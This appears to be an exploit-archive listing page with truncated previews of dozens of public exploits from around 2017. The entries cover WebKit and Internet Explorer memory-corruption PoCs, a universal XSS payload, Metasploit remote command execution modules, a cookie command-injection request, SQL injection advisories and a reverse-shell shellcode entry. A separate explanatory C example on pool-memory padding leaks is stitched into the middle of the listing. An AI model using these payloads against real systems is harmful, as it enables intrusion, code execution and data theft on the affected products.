WebKit JSC - 'DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry)' Incorrect Scope Register Handling
scopeRegister; it should use |inlineStackEntry->m_codeBlock| instead of |m_codeBlock|. But it doesn't. As a result, the scope register of |inlineStackEntry->m_codeBlock| may have an incorrect offset in the stack layout phase. PoC: <!-- function f ... function ... eval('1'); f(); ... throw 1; f();...
WebKit JSC - 'JSObject::putInlineSlow' / 'JSValue::putToPrimitive' Universal Cross-Site Scripting
let f = document.body.appendChild(document.createElement('iframe')); let loc = f.contentWindow.location; f.onload = () => { let a = 1.2; a.__proto__.__proto__ = f.contentWindow; a['test'] = { toString: function () { arguments.callee.caller.constructor('alert(location)')(); } }; }; f.src = 'data:text/html,' +...
vBulletin 5.1.2 < 5.1.9 - Unserialize Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'vBulletin 5.1.2 Unserialize Code Execution', 'Description' = %q This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to...
Linux Kernel - 'BadIRET' Local Privilege Escalation
CVE-2014-9322 PoC for Linux kernel CVE-2014-9322 a.k.a BadIRET proof of concept for Linux kernel. This PoC uses only syscalls not any libraries, like pthread. Threads are implemented using raw Linux syscalls. Raw Linux Threads via System Calls Usage $ make badiret.elf is an ELF executable...
REDDOXX Appliance Build 2032 / 2.0.625 - Remote Command Execution
Advisory: Remote Command Execution as root in REDDOXX Appliance RedTeam Pentesting discovered a remote command execution vulnerability in the REDDOXX appliance software, which allows attackers to execute arbitrary command with root privileges while unauthenticated. Details ======= Product: REDDOX...
IPFire < 2.19 Update Core 110 - Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'IPFire proxy.cgi RCE', 'Description' = %q IPFire, a free linux based open source firewall distribution, version 'h00die ', module '0x09AL'...
VICIdial 2.9 RC 1 < 2.13 RC1 - 'user_authorization' Command Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'VICIdial userauthorization Unauthenticated Command Execution', 'Description' = %q This module exploits a vulnerability in VICIdial versions 2.9 R...
Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)
.class1 { float: left; column-count: 5; } .class2 { column-span: all; columns: 1px; } table { border-spacing: 0px; } var base_leaked_addr = ""; function infoleak() { var textarea = document.getElementById("textarea"); var frame = document.createElement("iframe"); textarea.appendChild(frame);...
WebKit - 'WebCore::Node::nextSibling' Use-After-Free
function freememory() { var a; for (var i = 0; i < ... <!-- ================================================================= ASan log: ================================================================= ==29516==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000b7070 at pc 0x0001111c843b bp...
CenturyLink ZyXEL PK5001Z Router - Root Remote Code Execution
/* PK5001Z CenturyLink Router/Modem remote root exploit */ /* oxagast / Marshall Whittaker */ /* marshall@likon:~/Code/pk5001zpwn$ gcc pk5001z00pin.c -o pk5001z00pin */ /* marshall@likon:~/Code/pk5001zpwn$ ./pk5001z00pin */ /* PK5001Z CenturyLink Router remote root 0day */ /* Enjoy! */ /* --oxagast */ /*...
Razer Synapse 2.20.15.1104 - rzpnk.sys ZwOpenProcess (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core/exploit/local/windows_kernel' require 'rex' require 'metasm' class MetasploitModule 'Razer Synapse rzpnk.sys ZwOpenProcess', 'Description' = %q A...
WebKit - 'WebCore::AccessibilityRenderObject::handleAriaExpandedChanged' Use-After-Free
div { visibility: collapse; } function eventhandler() { document.execCommand("bold", false); img.style.removeProperty("-webkit-appearance"); img.setAttribute("aria-expanded", "false"); } aaa <!-- ================================================================= ASan log:...
WebKit - 'WebCore::getCachedWrapper' Use-After-Free
function freememory() { var a; for (var i = 0; i < ... ::get() const /Users/projectzero/web...
WebKit - 'WebCore::RenderObject' with Accessibility Enabled Use-After-Free
link { text-transform: lowercase; } link::first-letter { border-spacing: 1em; } function go() { dt.appendChild(link); var s = link.style; s.setProperty("display", "table-column-group"); s.setProperty("-webkit-appearance", "menulist-button"); } function eventhandler() { dir.setAttribute("aria-labeledby", "meta");...
WebKit - 'WebCore::InputType::element' Use-After-Free (1)
var runcount = 0; function go() { runcount++; if (runcount > 2) return; i.type = "foo"; i.select(); i.type = "search"; document.onsearch = document.body.onload; document.execCommand("insertHTML", false, ""); } <!-- ================================================================= ASan log:...
Nitro Pro PDF - Multiple Vulnerabilities
Vulnerabilities Summary The following advisory describes three vulnerabilities found in Nitro / Nitro Pro PDF. Nitro Pro is the PDF reader and editor that does everything you will ever need to do with PDF files. The powerful but snappy editor lets you change PDF documents with ease, and comes wit...
REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure
Advisory: Arbitrary File Disclosure with root Privileges via RdxEngine-API in REDDOXX Appliance RedTeam Pentesting discovered an arbitrary file disclosure vulnerability in the REDDOXX appliance software, which allows unauthenticated attackers to list directory contents and download arbitrary file...
WebKit - 'WebCore::Node::getFlag' Use-After-Free
-webkit-flow-into: textarea; function freememory() { var a; for (var i = 0; i < ... foo <!-- ================================================================= ASan log: ================================================================= ==29717==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000053b3...
WebKit - 'WebCore::RenderSearchField::addSearchResult' Heap Buffer Overflow
function go() { i.value = "1"; i.type = "search"; f.submit(); } ... ::buffer() /Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2694d46 #1 0x116496bed in WTF::Vector::end()...
WebKit - 'WebCore::AccessibilityNodeObject::textUnderElement' Use-After-Free
function go() { li.hidden = true; dir.setAttribute("aria-labeledby", "map"); } <!-- ================================================================= ASan log: ================================================================= ==728==ERROR: AddressSanitizer: heap-use-after-free on address 0x6080000908a0 at...
PaulShop - SQL Injection / Cross-Site Scripting
Exploit Title: PaulShop CMS - SQL Injection and Stored XSS Date: 07/23/2017 Exploit Author: BTIS Team http://www.btis.vn Vendor Homepage: https://codecanyon.net/item/paulshop-cms-with-shopping-cart-system/18070714 Version: 03/27/2017 Tested on: Apache/2.4.7 Ubuntu Contact: [email protected] Can no...
MAWK 1.3.3-17 - Local Buffer Overflow
#!/usr/bin/python Developed using Exploit Pack - http://exploitpack.com - Exploit Author: Juan Sacco at KPN Red Team - http://www.kpn.com Tested on: GNU/Linux - Kali 2017.1 Release Description: MAWK AWK Interpreter 1.3.3-17 and prior is prone to a stack-based buffer overflow vulnerability because...
ManageEngine Desktop Central 10 Build 100087 - Remote Code Execution (Metasploit)
Exploit Title: ManageEngine Desktop Central 10 Build 100087 RCE Date: 24-07-2017 Software Link: https://www.manageengine.com/products/desktop-central/ Exploit Author: Kacper Szurek Contact: https://twitter.com/KacperSzurek Website: https://security.szurek.pl/ CVE: CVE-2017-11346 Category: remote ...
NEC UNIVERGE UM4730 < 11.8 - SQL Injection
Exploit Title: NEC UNIVERGE UM4730 < 11.8 SQL Injection Vulnerability: SQL injection login bypass Date: 15-12-2016 Exploit Author: b0x41s Author web: https://www.xrayit.nl Vendor Homepage: https://www.nec-enterprise.com Category: webapps Version: 11.6.0.31 Tested on: Windows Server 2008 Description:...
Joomla! Component JoomRecipe 1.0.4 - 'search_author' SQL Injection
Exploit Title: Joomla JoomRecipe 1.0.4 Component - Blind SQL Injection Vulnerability Date: 20.07.2017 Exploit Author: Teng Vendor Homepage: http://joomboost.com/ Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/food-a-beverage/joomrecipe/ Version: 1.0.4 Platform:...
Virtual Postage (VPA) - Man In The Middle Remote Code Execution
Exploit Title: Virtual Postage VPA - Remote Code Execution via MITM Date: 20/Jul/17 Exploit Author: MaXe Vendor Homepage: https://play.google.com/store/apps/details?id=a2.virtualpostage.com http://archive.is/EdtJT Software Link: N/A Screenshot: N/A Version: 1.0 Tested on: Android 4.1.0 Google API...
WordPress Plugin IBPS Online Exam 1.0 - SQL Injection / Cross-Site Scripting
Exploit Title: IBPS Online Exam Plugin for WordPress v1.0 - XSS SQLi Date: 2017-07-11 Exploit Author: 8bitsec Vendor Homepage: https://elfemo.com/demo/server2/order2032/ Software Link: https://codecanyon.net/item/ibps-online-exam-plugin-for-wordpress/20028534 Version: 1.0 Tested on: Kali Linux 2....
Docker Daemon - Unprotected TCP Socket
Exploit Title: Docker Daemon - Unprotected TCP Socket Date: 20-07-2017 Exploit Author: Martin Pizala Vendor Homepage: https://www.docker.com Software Link: https://www.docker.com/get-docker Version: Since 0.4.7 2013-06-28 feature: mount host directories Tested on: Docker CE 17.06.0-ce and Docker...
SKILLS.com.au Industry App - Man In The Middle Remote Code Execution
Exploit Title: SKILLS.com.au Industry App - Remote Code Execution via MITM Date: 20/Jul/17 Exploit Author: MaXe Vendor Homepage: https://play.google.com/store/apps/details?id=a3.skills.com http://archive.is/NRlNP Software Link: N/A Screenshot: N/A Version: 1.0 Tested on: Android 4.1.0 Google APIs...
Tilde CMS 1.01 - Multiple Vulnerabilities
Exploit Title: Tilde CMS 1.01 Multiple Vulnerabilities Date: July 7th, 2017 Exploit Authors: Paolo Forte, Raffaele Forte Vendor Homepage: http://www.tildenetwork.com/ Version: Tilde CMS 1.0.1 Tested on: Ubuntu 12.04, PHP 5.3.10 I. INTRODUCTION...
VACRON VIG-US731VE 1.0.18-09-B727 IP Camera - Authentication Bypass
Exploit Title: IP Camera VACRON VIG-US731VE Date: 2017-07-18 Exploit Author: anonymous Vendor Homepage: www.vacron.com Version: V1.0.18-09-B727 1. doesn't require credentials to fetch snapshot like this: http://192.168.0.200/ipcam/jpeg 2. allows "viewer" level user to fetch any camera setting, eg...
Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)
Exploit Title: Citrix SD-WAN logout cookie preauth Remote Command Injection Vulnerability Date: 02/20/2017 Exploit Author: xort @ Critical Start Vendor Homepage: www.citrix.com Software Link: https://www.citrix.com/downloads/cloudbridge/ Version: 9.1.2.26.561201 Tested on: 9.1.2.26.561201 OS...
Linux/x86_64 - Reverse Shell (192.168.1.8:4444) Shellcode (104 bytes)
Linux/x86_64 - Reverse Shell (192.168.1.8:4444) Shellcode (104 bytes). Shellcode exploit for the Linux x86-64 platform. ;Category: Shellcode ;Title: GNU/Linux x86_64 - Reverse Shell Shellcode ;Author: m4n3dw0lf ;Github: https://github.com/m4n3dw0lf ;Date: 18/07/2017 ;Architecture: Linux x86_64 ;Tested on: 1 S...
Sonicwall < 8.1.0.2-14sv - 'sitecustomization.cgi' Command Injection (Metasploit)
Exploit Title: Sonicwall importlogo/sitecustomization CGI Remote Command Injection Vulnerability Date: 12/25/2016 Exploit Author: xort @ Critical Start Vendor Homepage: www.sonicwall.com Software Link: sonicwall.com/products/sra-virtual-appliance Version: 8.1.0.2-14sv Tested on: 8.1.0.2-14sv CVE :...
Sonicwall Secure Remote Access 8.1.0.2-14sv - Command Injection
Sonicwall Secure Remote Access (SRA) - Command Injection Vulnerabilities Vendor: Sonicwall (Dell) Product: Secure Remote Access (SRA) Version: 8.1.0.2-14sv Platform: Embedded Linux Discovery: Russell Sanford of Critical Start www.CriticalStart.com CVE: CVE-2016-9682 Tested against version 8.1.0.2-14sv ...
Microsoft Windows 7 SP1 (x86) - GDI Palette Objects Local Privilege Escalation (MS17-017)
E-DB Note: + Source: https://github.com/sensepost/gdi-palettes-exp + Binary: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42432.exe include include include include //From http://stackoverflow.com/a/26414236 this defines the details of the NtAllocateVirtualMemor...
Oracle E-Business Suite 12.x - Server-Side Request Forgery
Exploit Title: Oracle E-Business Suite - Server Side Request Forgery Date: 19 July 2017 Exploit Author: Sarath Nair aka AceNeon13 Contact: @AceNeon13 Greetings: Raj3sh.tv, Deepu.tv Vendor Homepage: www.oracle.com Software Link:...
Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection
POST /cgi-bin/login.cgi?redirect=/ HTTP/1.1 Host: 10.242.129.149 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: https://10.242.129.149/cgi-bin/login.cgi?redirect=/ Cookie: CAKEPHP=sleep 10 Content-Type...
Sonicwall < 8.1.0.6-21sv - 'gencsr.cgi' Command Injection (Metasploit)
Exploit Title: Sonicwall gencsr CGI Remote Command Injection Vulnerability Date: 12/24/2016 Exploit Author: xort @ Critical Start Vendor Homepage: www.sonicwall.com Software Link: sonicwall.com/products/sra-virtual-appliance Version: 8.1.0.6-21sv Tested on: 8.1.0.2-14sv CVE : awaiting cve vuln:...
Barracuda Load Balancer Firmware < 6.0.1.006 - Remote Command Injection (Metasploit)
Exploit Title: Barracuda Load Balancer Firmware <= v6.0.1.006 Remote Command Injection. 'Description' = %q This module exploits a remote command execution vulnerability in the Barracuda Load Balancer Firmware Version <= v6.0.1.006 (2016-08-19) by exploiting a vulnerability in the web administration interface. By sending ...
Microsoft Internet Explorer 11.1066.14393.0 - VBScript Arithmetic Functions Type Confusion
->PvarGetArithVal(); VAR* arith_v2 = v2->PvarGetArithVal(); int result_type = result_lookup_table[v1->vartype][v2->vartype]; if (result_type == 10) RaiseError(...); if (result_type == 2) { ... } else if (result_type == 3) { ... } else if (result_type == 4) { ... } v1->vartype = result_type; where the logic for VAR::PvarGetArithVal is roughly VAR...
Sophos Web Appliance 4.3.0.2 - 'trafficType' Remote Command Injection (Metasploit)
Exploit Title: Sophos Web Appliance reporting JSON trafficType Remote Command Injection Vulnerability Date: 01/28/2017 Exploit Author: xort @ Critical Start Vendor Homepage: www.sophos.com Software Link: sophos.com/en-us/products/secure-web-gateway.aspx Version: 4.3.0.2 Tested on: 4.3.0.2 CVE :...
PEGA Platform <= 7.2 ML0 - Missing Access Control / Cross-Site Scripting
Summary ======= 1. Missing access control CVE-2017-11356 2. Multiple cross-site scripting CVE-2017-11355 Vendor ====== "Pegasystems Inc. is the leader in software for customer engagement and operational excellence. Pega’s adaptive, cloud-architected software – built on its unified Pega® Platform ...
Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Privilege Escalation
I'm a big fan of Hashicorp but this is an awful bug to have in software of their calibre. Their vagrant plugin for vmware fusion uses a product called Ruby Encoder to protect their proprietary ruby code. It does this by turning the ruby code into bytecode and executing it directly. Unfortunately...
Microsoft Windows Kernel - 'IOCTL 0x120007 NsiGetParameter' nsiproxy/netio Pool Memory Disclosure
/* We have discovered that the handler of the 0x120007 IOCTL in nsiproxy.sys (\\.\Nsi device) discloses portions of uninitialized pool memory to user-mode clients, likely due to output structure alignment holes. On our test Windows 7 32-bit workstation, an example layout of the output buffer is as...
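The "alignment holes" mechanism the advisory points to, shown as an added example that is not part of the advisory and has nothing to do with the real nsiproxy.sys output format: a hypothetical output structure (field names, widths and the 0xCC "stale pool" pattern are all assumptions) whose padding bytes are never written, so copying the whole structure back to the caller leaks whatever the recycled allocation previously held. The hardened variant zeroes the block before filling it, which is the standard remedy (RtlZeroMemory in a driver, memset here).

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical output structure (assumption, not the NSI layout): the mixed
 * field widths make the compiler insert padding after `flags` and after `tag`. */
struct nsi_param_out {
    uint8_t  flags;
    uint32_t value;
    uint16_t tag;
    uint64_t big;
};

#define STALE 0xCC  /* simulated leftovers of a previous owner of the pool block */
#define FIELD_BYTES (sizeof(uint8_t) + sizeof(uint32_t) + sizeof(uint16_t) + sizeof(uint64_t))

/* Simulate the driver: take a recycled block (filled with STALE), populate the
 * structure either the vulnerable way (named fields only) or the hardened way
 * (zero the whole block first), then copy the full structure to the caller.
 * Returns how many bytes of the caller's buffer still carry the STALE pattern. */
static size_t leaked_bytes(int zero_first) {
    unsigned char user_buf[sizeof(struct nsi_param_out)];
    struct nsi_param_out *p = malloc(sizeof *p);
    if (!p)
        return (size_t)-1;
    memset(p, STALE, sizeof *p);           /* what the previous owner left behind */

    if (zero_first)
        memset(p, 0, sizeof *p);           /* hardened: RtlZeroMemory equivalent */
    p->flags = 1;                          /* every named field is written ...   */
    p->value = 0x11223344u;                /* (values chosen to contain no 0xCC)  */
    p->tag   = 0x5566;
    p->big   = 0x778899aabbddeeffull;

    memcpy(user_buf, p, sizeof user_buf);  /* ... but the copy-out covers padding too */
    free(p);

    size_t n = 0;
    for (size_t i = 0; i < sizeof user_buf; i++)
        if (user_buf[i] == STALE)
            n++;
    return n;
}

/* Number of padding bytes the ABI inserted into the structure. */
static size_t padding_bytes(void) {
    return sizeof(struct nsi_param_out) - FIELD_BYTES;
}

int main(void) {
    printf("struct size %zu, padding bytes %zu\n",
           sizeof(struct nsi_param_out), padding_bytes());
    printf("vulnerable copy leaks %zu stale bytes\n", leaked_bytes(0));
    printf("zeroed copy leaks %zu stale bytes\n", leaked_bytes(1));
    return 0;
}
```

The leak count equals the padding count exactly: every named field is initialised, so the only bytes that survive are the holes the ABI inserted, which is why the advisory's "alignment holes" explanation is consistent with every field appearing to be set in source.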
Microsoft Internet Explorer 11.0.9600.18617 - 'CMarkup::DestroySplayTree' Memory Corruption
element. The bug was confirmed on IE Version 11.0.9600.18617 Update Version 11.0.40 running on Windows 7 64-bit. I was unable to reproduce it on Windows 10. PoC: ========================================== <!-- function go() { setTimeout("window.location.reload()", 100);...
Belkin F7D7601 NetCam - Multiple Vulnerabilities
Exploit Title: Belkin NetCam F7D7601 | Remote Command Execution Date: 17/07/17 Exploit Author: Wadeek Vendor Homepage: http://www.belkin.com/ Tested on: Belkin NetCam F7D7601 WeMoNetCamWW2.00.10684.PVT ================================================ UnsetupMode == 0 Hard-coded password admin:adm...
Orangescrum 1.6.1 - Multiple Vulnerabilities
Exploit Title: Orangescrum 1.6.1 Multiple Vulnerabilities Google Dork: NA Date: July 9 2017 Exploit Author: [email protected] Author blog : cupuzone.wordpress.com Vendor Homepage: https://www.orangescrum.org/ Software Link: https://www.orangescrum.org/free-download Version: 1.6.1 Tested on:...
Geneko Routers - Path Traversal
Vulnerability Summary The following advisory describes an Unauthenticated Path Traversal vulnerability found in the Geneko GWR router series. Geneko GWG is a compact and cost-effective communications solution that provides cellular capabilities for fixed and mobile applications such as data acquisition...
Apple Mac OS X + Safari - Local Javascript Quarantine Bypass
Title: Mac OS X Local Javascript Quarantine Bypass Product: Mac OS X Version: 10.12, 10.11, 10.10 and probably prior Vendor: apple.com Type: DOM Based XSS Risk level: 3 / 5 Credits: [email protected] CVE: N/A Vendor notification: 2017-07-15 Vendor fix: 2017-09-25 Public...